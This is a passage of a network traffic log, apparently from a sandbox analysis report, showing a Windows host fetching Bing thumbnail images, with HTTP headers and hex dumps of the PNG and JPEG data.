2024-12-08 12:31:23 UTC	16069	IN	Data Raw: db 59 f9 1a 1b be 19 d6 45 ed cc d1 d8 6a 22 ce ef 5f 9e 39 6e bf 7f 34 cf 3e d7 fd d4 9f f4 ca 24 fe e7 f1 d5 8b f8 26 fe d0 82 fe ee df 4f 86 c3 53 82 f6 48 8c d7 1e 75 bd 87 c9 f7 23 ff 00 6f fd 8a e4 f5 cd 37 fe 11 3b 8d 53 fd 26 e2 7b 59 a7 b2 97 49 b4 87 ee 47 6b e4 f9 92 79 bf f7 f2 b5 35 68 26 8f 51 d5 3c db 9f f9 0a 6a 97 be 74 3f 68 f3 bc 8f 29 23 fd e7 ff 00 13 59 fb 3a 70 f8 03 da 1a 9a 21 bb 8f 4f 82 58 b4 4f f8 95 79 1e 66 ad e7 5b ff 00 a8 78 ff 00 d6 3c c9 5b 5e 1f f1 5e a3 6f 6d a2 c5 e2 9b 8d 66 7b 59 a0 b9 96 1d 43 4f d9 8b f8 fe e7 91 34 29 f3 6f 5f e0 ae 37 50 8f c4 52 78 77 ed 7a 7e 9b f6 dd 42 68 2e 7f b2 34 eb bb 84 ff 00 89 9d bc 7f ea fc df ee 7f 7f e7 a3 c3 d1 c3 e2 4f 0e c1 aa e9 57 37 17 ba 55 ec 16 57 df da 3f f3 ef 71 6d fd Data Ascii: YEj"_9n4>$&OSHu#o7;S&{YIGky5h&Q<jt?h)#Y:p!OXOyf[x<[^^omf{YCO4)o_7PRxwz~Bh.4OW7UW?qm
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 95 e2 97 f7 37 9e 4c 3f c1 e4 7f 0c 94 ba 87 f6 1d e5 be 97 2c bf db 5a 5d d6 8b ad e9 df e9 70 ea 1f 25 a4 4b 73 b6 4f fa 69 e4 f9 7f 22 7f 7e 9d 68 f3 e9 5e 24 f1 44 b7 5e 1e 82 de 38 b5 3b db 6f b0 6b 63 cd b4 7b 3f f9 6b a7 d9 85 d8 b3 c6 fe ff 00 72 4a e2 c4 53 7e d0 d2 99 35 dc 9a 75 c6 8b e6 e9 57 3f d8 ba 84 df 66 b6 ff 00 9f cf b4 7f 1d d3 fc 9f c5 b3 f8 2a 8f 8e b4 3b ad 2b c1 fe 3a f1 f7 c3 b1 75 3e bf 69 65 a7 45 a7 7d ad 61 37 69 3a cd 1f ef a2 29 f7 ff 00 73 ff 00 2c cd 6a f8 c3 4e bb d2 2d 75 ad 14 5c dc 6a 9a 2e 8d aa 59 69 1a 84 36 96 ff 00 63 b9 b7 ff 00 57 3f ee 7c bf f9 64 d1 7e e7 cd fb ec f5 2f 87 b4 9d 5e 4b 8f f8 4c 34 fd 37 59 86 29 b5 4f 36 29 a5 f2 61 9a 0b 28 df 7a 47 70 8f b7 e7 fe e5 3a 7e ff 00 be 68 79 df 82 06 af 71 a7 c1 Data Ascii: 7L?,Z]p%KsOi"~h^$D^8;okc{?krJS~5uW?f*;+:u>ieE}a7i:)s,jN-u\j.Yi6cW?\|d~/^KL47Y)O6)a(zGp:~hyq
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 28 fb 27 99 e0 cd 2f ec 9f f3 05 9e 4b 6f f8 f7 d9 35 c2 48 ff 00 f1 f1 51 dd da 43 26 b5 a2 4b 2d b7 ee bf b2 ec ae 7c 98 7f e5 a7 ef be 77 93 fe 03 f2 56 84 df bb d3 af ad 3e d3 e7 5a c3 3c 92 c3 ff 00 6d 1e 8a 95 6f c9 c8 6e 63 dd c7 69 27 ee ae ff 00 e5 b7 99 ff 00 d8 56 1e ad 04 b6 7a 75 8c 57 77 3f f1 fb 63 1d f7 ee 7f b8 df df ae d3 c3 3a 2c da e5 be 89 fe 8d 73 e5 5e c1 7b 63 f6 bf e0 f3 63 fb 9f f8 fd 57 f0 44 1e 67 d8 74 ab bf dc ea 10 e8 97 3a 47 ef be 4f 2f cb 99 e5 ae ec 36 6b 4e 83 e4 de db a3 8e a5 3f de 1c de 87 3f d9 ff 00 e9 b7 fd 76 ad 0f 0c 5a 43 27 85 7c 45 17 d9 bf d7 58 f9 be 4c 3f eb b7 c0 fb e1 f2 eb 3f 43 b4 86 e3 4e be b4 8a da e3 cd f2 23 96 d3 ce ff 00 7e ba 0f 06 c9 69 6f fd a9 f6 bb 6b 88 75 0b 29 e3 b6 9a d2 6f f9 e5 ff 00 Data Ascii: ('/Ko5HQC&K-\|wV>Z<monci'VzuWw?c:,s^{ccWDgt:GO/6kN??vZC'\|EXL??CN#~ioku)o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49743	23.206.197.26	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:22 UTC	367	OUT	GET /th?id=OADD2.10239337201808_1NREAF5SJS6TG8GUU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive
2024-12-08 12:31:23 UTC	627	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Type: image/png Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Content-Length: 1874 Date: Sun, 08 Dec 2024 12:31:23 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.36c5ce17.1733661083.4bb9639
2024-12-08 12:31:23 UTC	1874	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 06 e7 49 44 41 54 48 4b 95 93 0b 54 93 e7 19 c7 3f 2e 81 90 1b b7 ba a3 67 dd 7a a6 75 a7 83 40 88 dc ca aa d4 1d 94 02 02 81 90 ac 5e d0 8e e3 8e 5d 2f 93 22 0c 08 01 af 08 a2 a0 20 a2 50 44 ec 9c 73 dd d9 dc ea ac 68 5b 35 17 92 70 27 5c 12 12 42 a2 dc aa 88 a8 79 9f 8f 90 48 4b f6 26 fb 8e eb d6 d9 6d bf 73 fe e7 3b 39 e7 7d fe bf ef 79 bf 13 e2 bb 58 ad 34 ae e4 ca 47 8b b9 72 e3 17 5c b9 6e 3c 44 31 f0 24 44 d9 83 a3 9a 0c 51 de 54 87 2a db 8e 87 2a ff b2 9e f8 a3 d8 8b 1a f9 df e0 7d 31 f1 fd 08 d9 Data Ascii: PNGIHDRw=sRGBgAMAapHYsodIDATHKT?.gzu@^]/" PDsh[5p'\ByHK&ms;9}yX4Gr\n<D1$DQT**}1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49744	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:22 UTC	346	OUT	GET /th?id=OADD2.10239401719378_1QE5OGFYA33L2ZPDG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:23 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 403418 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 76DA31AF269E407C94218D3DAEEB1781 Ref B: EWR30EDGE0915 Ref C: 2024-12-08T12:31:23Z Date: Sun, 08 Dec 2024 12:31:22 GMT Connection: close
2024-12-08 12:31:23 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 32 20 31 31 3a 31 31 3a 35 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:02 11:11:538C
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 80 33 01 df f2 e3 fc 2b 37 23 55 12 11 18 3f 50 73 52 6c 0b 82 3f 41 56 36 7c a3 18 3c fa d2 f9 78 5c 9e 07 f3 15 0e 65 28 d8 af 82 46 3b 67 b9 f5 a9 ed f2 39 3d 49 c7 5a 70 40 3e a7 1c 91 4b 08 5e a7 81 d7 15 0d dd 14 91 22 e4 93 db 90 38 ab 71 be 17 69 ed d8 55 6c 8e 78 cf 1d fb 51 bc 2a 71 9c e3 d6 b3 92 b9 a2 76 2f 2b 80 a0 8c 9f 71 e9 4f 79 33 c8 3d 39 39 f4 aa 31 4c 03 1c 0e 73 df d6 9f e6 a7 7c 9e 3f 23 51 c8 5f 38 af 70 cc bb 73 9c 03 f8 d3 bc dd cb d7 af 6a a5 34 9b 3e e9 21 b1 d2 a3 86 56 56 dd fa 7a d6 9c 88 cf 9c d3 8d 30 77 31 1c 74 c5 5b c0 11 82 39 fe 2a cd 86 5f 97 24 e0 8c 7d 73 52 fd ab f7 64 6f c0 1f 9d 65 28 b6 cd 63 24 91 25 c3 9d c0 1e bd b1 ed 4c 56 19 03 a8 3f a5 41 24 80 c9 91 c7 e3 4c 69 c8 ce 38 e7 d2 a9 41 93 ce ae 5e 2c 06 01 Data Ascii: 3+7#U?PsRl?AV6\|<x\e(F;g9=IZp@>K^"8qiUlxQqv/+qOy3=991Ls\|?#Q_8psj4>!VVz0w1t[9_$}sRdoe(c$%LV?A$Li8A^,
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: a7 1e 10 1c 7e 23 d2 b2 e5 36 52 2e 2c ca 38 ef c8 f4 34 df 37 e6 e7 2b cf ad 55 41 86 c9 e7 da a6 57 ed c7 d7 d6 97 2a 29 49 93 ac a4 2e 0e e3 ed 9a 8a 69 18 b6 3a 0f 4e bc 62 8c e5 09 f5 c6 05 34 c6 7f 23 93 db 14 24 90 36 c0 b0 e3 df 3d 71 d2 9e a7 38 18 00 fa f6 a6 6c f5 e7 bd 3a 35 f9 b1 fc 22 9b 01 c5 73 c7 41 4d 60 36 e4 0f 61 da 9c 0b 0c 70 3b e3 d6 a3 91 d9 99 b1 d3 de 92 b8 32 3d fb 79 3d a8 ce 39 2d d8 7d 45 34 a1 0f cd 19 6d 80 0e 58 71 c5 5e 86 7a 92 2b 80 a7 38 c9 a7 2b 9d f8 1f d6 a1 0a 4f 27 9f 6c 53 b7 05 00 9c 0c 9f c6 93 40 a4 5f 85 90 20 39 e0 53 a5 95 7c b1 9e bf 97 5a a1 f6 8f 94 e0 f1 9e 31 d2 a3 92 76 3c 0e 32 47 e3 53 ec ee cb 75 55 8b 4f 38 dd e8 3d bb fd 69 5a 52 38 18 1c d5 02 f8 ea 72 7a 7d 29 19 c8 56 03 a9 f6 15 a7 b3 32 f6 Data Ascii: ~#6R.,847+UAW*)I.i:Nb4#$6=q8l:5"sAM`6ap;2=y=9-}E4mXq^z+8+O'lS@_ 9S\|Z1v<2GSuUO8=iZR8rz})V2
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: c9 1c 01 c1 f5 f7 ab fe 56 17 23 19 a0 c5 8e 83 34 f9 c7 74 53 11 0c 8d cb c7 4f f2 29 7c 8f 9b ee fa 9a b5 e5 13 f5 a5 f2 cf 6f ce 97 30 68 55 58 71 c6 dc d3 bc 83 eb da ad 79 7d cf 7a 5f 2c 7e 14 b9 83 99 15 bc a0 7a 8e 7a 50 62 5e 38 18 1d 2a d6 cf ff 00 55 23 26 5b 22 8e 60 e6 2b 18 87 23 1d 7f 4a 67 97 9e 71 f8 d5 b3 19 e7 8a 3c bc 74 1c 7d 29 f3 07 32 29 6c 25 76 9c 11 9e 45 20 8f 1c fa 8e b8 ab 86 33 bb a7 6a 3c bc f5 a7 cc 17 45 41 10 2a 46 de 78 3c d2 88 fe 53 8c 7a 64 55 af 2f a6 47 23 d2 9c 22 f4 06 8e 61 68 53 f2 73 ca ae 0f 5e b4 ef 2b 91 8e 07 5f c6 ad 88 b1 c0 ef 4b e5 7f 3c 51 cc 1c c8 ac 23 01 7e 5f 4a 51 18 db d2 ad 79 5f cb 14 e5 8f e5 e9 4b 98 9e 74 55 58 fe 6c 0f 4e 29 c1 3d 6a c2 c7 8a 5d 84 f2 45 2e 61 73 90 6d e8 0d 39 63 fa 55 8d Data Ascii: V#4tSO)\|o0hUXqy}z_,~zzPb^8U#&["`+#Jgq<t})2)l%vE 3j<EAFx<SzdU/G#"ahSs^+_K<Q#~_JQy_KtUXlN)=j]E.asm9cU
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 0e 09 a4 e4 ec 8b 76 ba 8d c4 4c 25 b7 b9 96 26 3f 31 2a 78 27 de ad 47 e2 2d 66 25 0c b7 d2 6d 2d ce 70 47 3f 5a ca 8d b6 b1 dc 09 04 e4 ff 00 4c 7a d1 d3 8c 00 09 e9 fa d5 72 c5 8b 63 7a 1f 14 eb 51 b1 c5 eb 72 43 73 82 3e 95 63 fe 13 0d 70 b0 3f 6a 5c ae 41 f9 45 72 ed 80 a4 13 c1 e4 0e bd 7d 69 55 c8 f5 27 1d 33 ef de 97 24 7b 0f 9a 5d ce 9a 6f 19 eb 6f b4 ad d8 5d ac 0e 56 3c 74 f5 f6 a9 ff 00 e1 3f d7 b6 80 65 84 0e 30 56 2e 4e 3f c6 b9 2d d9 60 4e 73 e8 47 1d 69 e1 fa 1e 8b e8 7f cf ad 2f 67 0e c1 cd 2e e7 a1 78 0b c5 da be a9 e2 45 b1 bd 31 c9 1b a3 31 28 b8 2b 81 c7 e0 6b bb 57 cf 18 1c 75 af 11 d0 35 8b ed 16 f8 dd 58 c8 a0 ed 0a ea c3 2a c3 d0 ff 00 3a f4 cf 05 78 ba c3 5a 48 ed 67 22 de fc 8e 63 23 0b 21 1d 4a 9f 7f 4e b5 cb 5a 9b 4e e9 68 74 Data Ascii: vL%&?1x'G-f%m-pG?ZLzrczQrCs>cp?j\AEr}iU'3${]oo]V<t?e0V.N?-`NsGi/g.xE11(+kWu5X:xZHg"c#!JNZNht
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: c7 b5 16 01 ea ca d8 3c f0 0e 7b 0e d4 16 22 4c 13 d7 1f 4c 63 80 7d ea 30 18 a8 21 8f 5e 73 d7 8a 66 ec 37 ca 78 3d 46 3f 1a 2c 05 85 39 e3 38 1c f7 18 03 b1 ff 00 f5 52 b3 7c a0 71 93 91 8f a5 44 bc b0 51 9e 3a 81 c7 5e bf fe aa 3f ba 7e 6e 78 c7 f4 a4 52 25 62 c1 41 23 9c 9e 41 ea 3f a8 a4 cb 06 e4 7b e4 70 06 47 6e e4 7d 28 52 7b 0c 31 3f 98 03 f2 a7 45 bb 60 0c 3e 6c e0 e7 93 f9 d4 b0 49 b1 55 32 b8 24 95 eb 81 d4 52 46 3e 50 38 e4 7e 47 de 9c 8a c1 c6 ec 96 e3 a7 4a b5 6e 8a 2c 6f 1c 9f de 2a 6d 00 e3 82 4f 5c d6 73 a8 a2 8e 8a 74 5c b7 d0 aa c0 04 e0 f1 cf 6e b9 ed 4c ce f6 0a 54 72 76 e3 8e 31 eb eb 51 2c a1 94 e3 3f 2e 7e 9f 5c 1a 92 3b 86 41 e5 8d c5 b8 18 03 9f a9 ad 3a 18 f5 14 e4 a1 c9 c8 3d 73 8c f3 c6 33 8e 05 23 3b 1c 81 f8 0e 40 e0 f6 c5 Data Ascii: <{"LLc}0!^sf7x=F?,98R\|qDQ:^?~nxR%bA#A?{pGn}(R{1?E`>lIU2$RF>P8~GJn,o*mO\st\nLTrv1Q,?.~\;A:=s3#;@
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 91 65 04 51 b0 39 00 90 40 3d 30 07 be 73 55 34 eb 80 ea 51 27 2a c0 63 00 ff 00 08 1c e3 bf 6a 35 52 52 3c ab 9e 30 cb 9c e4 9e 87 80 7b 74 a4 68 e6 9a b9 65 ed b6 a2 ba 5b 44 b1 c4 0e 03 0d d8 ff 00 eb 9e b9 a8 6e 22 d9 90 96 ab c6 01 21 33 8e 39 cf ae 47 e5 50 da dd 36 c1 9b 8d e1 98 06 dd df d2 a4 b8 8f ce 77 6f b4 28 72 07 cb 93 8c 01 40 b4 6b 43 b1 f0 df 8c f5 3f 0f 69 f0 d9 47 6f 0d cd ba 1c 08 c8 2a c0 67 24 75 af 50 f0 f6 b1 69 ab e9 a9 71 6f f2 6e 5c b4 5e 60 dc a7 1d c7 6a f0 1b 23 31 8c 05 b8 c2 12 70 0f 1c ff 00 3c 75 fa 57 51 f0 96 e4 d9 78 f2 08 a6 3b fe d7 0b 47 18 5c fc ac 79 04 9e d8 c7 5e 6b 0a b4 d5 9b 47 6d 1a ce ea 2f 63 d9 1b 18 e3 aa e0 1e 33 d4 7d 78 a6 a6 77 0f 93 ee 83 9c f7 f4 ab 02 d5 d9 40 92 40 09 1f 4f a5 3c 5a a0 52 c2 50 Data Ascii: eQ9@=0sU4Q'cj5RR<0{the[Dn"!39GP6wo(r@kC?iGog$uPiqon\^`j#1p<uWQx;G\y^kGm/c3}xw@@O<ZRP
2024-12-08 12:31:23 UTC	16067	IN	Data Raw: 71 d2 bd 8c 54 93 c4 d3 f4 7f a1 e4 50 8d b0 b3 f5 5f a9 e6 1e 3e 9e da e6 78 fe cb 21 21 23 f9 b2 33 82 49 f4 fc 39 35 80 80 ee 60 a4 8c 73 83 d0 1e e4 56 8e a5 13 a4 9b d8 19 19 c9 c9 2c 73 c7 5f ff 00 55 51 93 99 15 46 15 48 e8 39 1f ad 7b b4 a2 a3 14 91 f1 98 b6 e7 55 c9 92 c6 ca 13 18 f9 88 20 1e 31 d3 a9 c7 f9 cd 3e 19 73 1b 05 7e 46 4e 39 e4 1f 63 ee 29 8a 80 80 42 6c 51 95 da 32 72 3b 73 52 da 2a 1b 82 00 5c 92 01 1f 8e 30 3f cf 7a a3 38 dd b5 62 d5 b1 53 12 3e c6 51 bb 04 11 9e 4f 71 dc 63 af 4a d8 d0 2d a5 bb bf 8c ac 0c 60 52 19 fe 40 a3 6f a7 f9 eb 93 5a 5e 16 f0 e4 97 93 09 ee e4 6b 5b 70 09 61 20 fd e3 81 c9 55 07 a8 c7 39 f7 ab 1a ee a1 10 b3 9e c2 d0 45 07 97 08 74 11 93 b9 94 7b 80 39 fc 8d 70 d4 af cd 2e 48 6a cf 7a 86 0d 53 8f b4 a8 ed Data Ascii: qTP_>x!!#3I95`sV,s_UQFH9{U 1>s~FN9c)BlQ2r;sR*\0?z8bS>QOqcJ-`R@oZ^k[pa U9Et{9p.HjzS
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 61 80 30 31 c0 fe 74 05 c4 fb 5a 06 1c b0 cf de f5 c7 b0 e9 4d 8a ea 22 e1 c0 eb 9c 7c 98 cf 6c e3 da 9d 94 f2 f0 07 1c 74 5e 70 7f 90 a5 41 1e dc 04 05 b3 b5 8e 3a 93 ef d7 f1 14 58 39 86 5c 4a 1a 40 63 8c 11 83 c1 1d 49 e8 3d aa 7f b4 00 a0 49 16 31 ce 4e 3f 1f c7 da a3 22 3f 9b 8d a4 0f 4c 16 fc 0f d2 9c 3c b0 a0 e3 8c 8c f0 7a 91 c6 47 e9 f4 a0 39 86 a6 42 97 ce 41 53 81 d7 82 7d 7f c9 a9 11 fc c5 21 77 00 32 7a 71 c1 c6 7f 95 31 b0 11 47 4f 98 9c 2e 7d 7b 53 b7 ae dd ab f7 42 fc c0 e7 d7 a8 34 07 30 ac e7 71 45 1c 67 92 4f 43 9f 6a 6c 92 a0 8f e5 00 93 c7 19 00 7f 9f ce 85 91 19 f1 80 0a ae 09 3c 12 3a 62 98 eb 03 48 49 72 38 c8 c3 73 c0 f4 e9 91 ef d6 95 8a e6 44 d6 f3 c7 b0 a3 90 58 8c f7 03 07 f9 66 9c 26 b7 dc 42 c8 bb c0 e7 93 c9 c9 aa 8a 91 06 Data Ascii: a01tZM"\|lt^pA:X9\J@cI=I1N?"?L<zG9BAS}!w2zq1GO.}{SB40qEgOCjl<:bHIr8sDXf&B
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: c6 e6 20 93 93 eb c1 1c 71 93 da a6 9e 5d f2 31 25 43 36 48 0b c8 03 8c f4 ef d7 9a 59 32 cc c5 90 b2 b2 92 00 3c 83 d4 11 d4 71 57 08 f2 a4 8e 7c 45 4f 6b 37 23 3f 13 48 db 49 3d fe 60 00 e7 9e 7d 8d 2d aa 4a ce 50 46 08 38 27 03 af 35 31 20 26 1b 90 31 df 83 cf 23 ea 0f 7c 7e 75 3d 8a 85 b8 25 d3 ef 10 03 13 80 3d 07 18 ef e8 3f 9d 5b 67 3c 63 a8 f7 89 d5 0b 14 dd 8e 55 b8 e5 40 c9 fc 7b 7b 55 39 1f 2d b8 a1 2e 07 3c 77 e4 73 ee 3d 6b 4e 78 fc a6 31 f4 56 3b 80 cf 5e 71 f9 75 35 4e 48 c4 b1 6f 2c 55 ba 60 74 65 ec 7a 0f c7 bf d6 92 34 a8 8a 8c fb be 4d 84 6d 63 80 07 b6 48 39 a6 b6 11 17 66 ec 37 de 18 e3 8f 51 d7 db 15 2c 89 b3 2b 21 6c 1c 10 4f 6e 07 6f 4e 29 e1 44 92 2e c7 2d bc 8c 70 79 ab 31 b5 c8 ca b4 9f 33 01 85 23 9e f9 cf 5c 54 4b 18 f3 1c 92 Data Ascii: q]1%C6HY2<qW\|EOk7#?HI=`}-JPF8'51 &1#\|~u=%=?[g<cU@{{U9-.<ws=kNx1V;^qu5NHo,U`tez4MmcH9f7Q,+!lOnoN)D.-py13#\TK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49745	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:22 UTC	375	OUT	GET /th?id=OADD2.10239401719379_1QJHVIFGU1A436B66&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:23 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 368092 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 47E685EAB57D49ECAE55E33E03492446 Ref B: EWR30EDGE1008 Ref C: 2024-12-08T12:31:23Z Date: Sun, 08 Dec 2024 12:31:22 GMT Connection: close
2024-12-08 12:31:23 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 32 20 31 31 3a 31 31 3a 31 39 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:02 11:11:198C
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 96 1d aa 37 f6 ab 1b 3d 7a d0 d1 f7 c5 05 a9 22 ae 4f 71 46 01 ed 53 98 fb d2 18 fd 68 2b 99 10 14 f4 a5 0a 47 6a 9b 61 1d 29 76 d1 70 e6 22 03 2b ed 4d 78 83 72 2a 62 31 ed 4d 60 4f 23 a5 01 cc 57 78 94 75 e4 d4 12 28 ea 33 57 76 13 4c 31 77 aa 52 b1 5a 14 36 31 eb 9e 28 f2 cd 5e f2 73 fc 34 79 58 fe 1e 94 f9 c9 e5 45 0f 24 f6 a5 31 1d d9 c6 6a f0 8b 1d a9 7c bc f1 8a 39 c7 cb 12 87 95 8e 94 18 bd 7a d5 e3 10 f4 c5 06 10 3a 7e 74 73 87 2a 39 b5 8c 1e 48 cd 39 62 07 b5 58 44 07 da a4 54 1d 2b a5 c8 e4 51 45 55 83 3c 91 cd 28 84 83 8c 55 d5 41 d4 d3 b6 29 eb 53 cc 57 22 29 ac 74 ef 28 f7 ab 9e 58 e9 8a 5f 2c 54 f3 8f 90 a6 23 cf 27 69 a5 58 cf 4f c4 55 bf 2f 14 b8 c2 f3 47 30 f9 51 5b ca a0 47 8e bc e2 ad 2a 67 93 4a b1 8e 82 97 30 f9 0a be 5f cb 81 4d f2 Data Ascii: 7=z"OqFSh+Gja)vp"+Mxrb1M`O#Wxu(3WvL1wRZ61(^s4yXE$1j\|9z:~ts9H9bXDT+QEU<(UA)SW")t(X_,T#'iXOU/G0Q[G*gJ0_M
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: d0 35 2a 47 96 1c d3 c4 5d 31 52 da 29 26 2c 67 38 1d 7d 2a 54 38 e9 fa d2 24 79 e3 f1 a9 02 7c d5 99 60 a4 f6 a7 a8 cf 5a 15 31 cd 38 2f 7a 91 36 03 03 b5 48 17 d0 53 42 77 14 fc 7c de d4 99 9b 62 a2 8a 7a a8 a4 5c 8a 75 23 39 31 76 81 de 90 a8 2b 9f 4a 5e b4 a0 63 8a 09 b8 dd 9f 35 1b 01 ea 6a 4c 77 c5 28 c0 a0 39 86 79 66 81 1e 2a 56 3e 94 99 e7 26 82 79 98 c0 94 bb 31 c5 49 c0 a3 8d dc d0 27 26 35 40 14 b8 1d 29 78 db 91 46 45 02 d4 4c 52 6d 14 a5 87 4a 42 e2 80 57 02 a3 ad 26 de e2 9a d2 0e d4 9e 68 1c e6 82 ac c7 f4 5a 38 a6 19 e3 1d 69 ab 3c 65 a8 2b 95 f6 25 27 d2 92 98 1d 4a f0 69 0b 81 de 81 72 b2 4a 40 7d 6a 26 b8 45 ea 69 bf 69 8f a0 39 a2 c3 e4 65 80 71 4e dd eb 55 7e d0 a3 bd 35 ae 95 57 96 c5 3b 31 fb 36 5e de bd e8 2c a5 73 59 8d a8 20 e3 Data Ascii: 5G]1R)&,g8}T8$y\|`Z18/z6HSBw\|bz\u#91v+J^c5jLw(9yf*V>&y1I'&5@)xFELRmJBW&hZ8i<e+%'JirJ@}j&Eii9eqNU~5W;16^,sY
